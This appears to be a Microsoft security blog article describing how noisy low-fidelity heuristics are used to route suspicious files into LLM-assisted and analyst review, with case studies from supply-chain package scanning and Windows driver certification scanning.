Zero-day exploitation is accelerating, and security teams increasingly need AI to reason about intent—not just indicators. But running high-cost AI analysis on every file is rarely feasible at scale. A practical alternative is to use inexpensive, low-fidelity (LoFi) signals as a routing layer: let noisy heuristics cast a wide net, then selectively escalate only the most suspicious hits into resource-intensive AI or analyst workflows. This article shows how that model can turn “too noisy to use” signals into high-confidence, actionable detections.
Introduction
Low-fidelity signals—heuristics that are cheap to compute but often ambiguous—have traditionally been viewed as a necessary annoyance in security operations. In high-volume pipelines, even a modest false-positive rate can translate into operational disruption: unnecessary blocks, costly recoveries, customer frustration, and analyst burnout from constant triage.
In the supply chain scanning service, operated by the Trust and Security Services group in Microsoft, LoFi signals include URL and certificate reputation, obfuscation and packer detection, multiple YARA rule families, high-impact API usage (for example, TerminateProcess), and vulnerability detections. Any one of these may be noisy—or may correctly flag perfectly legitimate behavior. The key shift in the AI era is to stop treating LoFi hits as verdicts and start using them as decision points: triggers for deeper, contextual analysis.
Two case studies: LoFi signals as routing, not verdicts
Case study 1: URL reputation + LLMs—turning noisy signals into zero-day detections
Our supply-chain scanning pipeline processes billions of files each day across public package registries. About 150 million files are routed through a URL reputation stage that extracts embedded URLs and evaluates them using threat intelligence plus heuristic rules. At this scale, small error rates become unmanageable: “a little noisy” turns into tens of thousands of daily alerts.
Before: Signal overload
Heuristic-only URL reputation produced roughly 40,000 blocking detections per day. Although many were genuine threats, the volume made it difficult to distinguish confirmed malware from false positives with confidence. Multiple heuristic layers provided partial signals, but none reliably produced a high-confidence verdict. As a result, analysts spent substantial time triaging files and tuning detection logic, weighing stricter blocking against the risk of disrupting legitimate packages and missing true malware.
After: LLM-assisted signal refinement
Adding LLM-based contextual analysis on top of URL reputation changed the signal-to-noise ratio. Instead of judging a URL in isolation, the model evaluates how it is used in surrounding code—an install script versus a documentation link, an obfuscated payload download versus a legitimate API call.
Outcome: ~2,000× reduction in alerts—down to about 20 high-confidence blocking detections per day—saving substantial analyst time. More importantly, the remaining alerts skew toward true zero-days that other engines in the pipeline were missing.
Case study 2: Windows Device Driver scanning pipelines—scaling LoFi signals into actionable detections
Beyond supply-chain package scanning, LoFi-driven routing patterns also show up in third-party device driver scanning used for the Windows certification program and post publishing rescan workflows. The pipeline operates at high volume under strict performance and reliability constraints, making “scan everything deeply” unrealistic.
The device driver pipeline receives about 70,000 submissions per month (January 2026 reference). From these submissions, roughly 1 million individual files are extracted and scanned. At this scale, even moderately noisy heuristics become unmanageable if treated as high-confidence detections.
Before: high-volume, low-confidence heuristics
Several LoFi heuristic detectors (primarily YARA rule-based) run in audit (aka telemetry-only) mode in the driver pipeline, including:
- Presence of network routing/manipulation (for example, network filter drivers): ~19,000 files/month
- Use of a process-termination API by a driver: ~5,000 files/month
- Obfuscated or packed driver: ~500 files/month
These detectors are fast and inexpensive, but inherently imprecise. Many flagged files reflect legitimate driver behavior (packing, process termination, filtering logic), so turning every hit into enforcement would create an unacceptable volume of false positives. Without refinement, LoFi hits function best as indicators of potential risk—not actionable verdicts.
After: selective escalation and targeted analysis
Instead of treating every LoFi hit equally, the pipeline escalates only the top 4% of results for deeper inspection. Those samples get additional correlation and malware analyst review, which enables the creation of concrete, high-confidence signatures that can be safely enforced at scale.
With this targeted escalation model:
- An average of ~5 new blocking detections are added per month
- Each detection typically identifies 10–100 malicious files
- Confirmed malware is blocked without broadly impacting legitimate driver submissions
This approach preserves throughput while focusing scarce expert time on the most suspicious artifacts. In other words, LoFi signals stop being “detections” and become efficient filters that route the right samples into high-cost analysis—where you can then generate durable, high-confidence blocking rules.
Key takeaways
- LoFi is a routing layer. In AI era pipelines, the goal is not to make every cheap heuristic perfectly precise—it is to use it to decide where to spend expensive compute and analyst time.
- Context beats indicators. LLMs can turn ambiguous URL signals into high-confidence decisions by reasoning about usage and intent, not just matching patterns.
- Escalate a small fraction, learn continuously. Selecting the top few percent for deeper analysis keeps throughput high and creates a feedback loop that produces enforceable signatures.
- Measure success by outcomes. The win is reduced alert volume and improved catch quality (for example, zero-days and durable blocking rules) rather than “more detections.”
Conclusion
As threat actors move faster and zero-days become more common, security systems have to make better decisions under tighter latency and cost constraints. The answer is not to replace LoFi signals with AI everywhere; it is to combine them. Cheap heuristics can cover the full surface area, while AI (and human expertise) is reserved for the small subset of events that truly deserve deeper reasoning.
Both case studies illustrate the same pattern. In supply-chain scanning, LLMs transformed a 40,000-per-day alert stream into ~20 high-confidence blocks—surfacing zero-days that were previously lost in the noise. In device driver scanning, selective escalation of the top LoFi hits converts “interesting but unenforceable” heuristics into a steady stream of high-confidence blocking signatures. In practice, the most scalable security posture is a tiered one: LoFi for breadth, AI for context, and analysts for the hardest calls.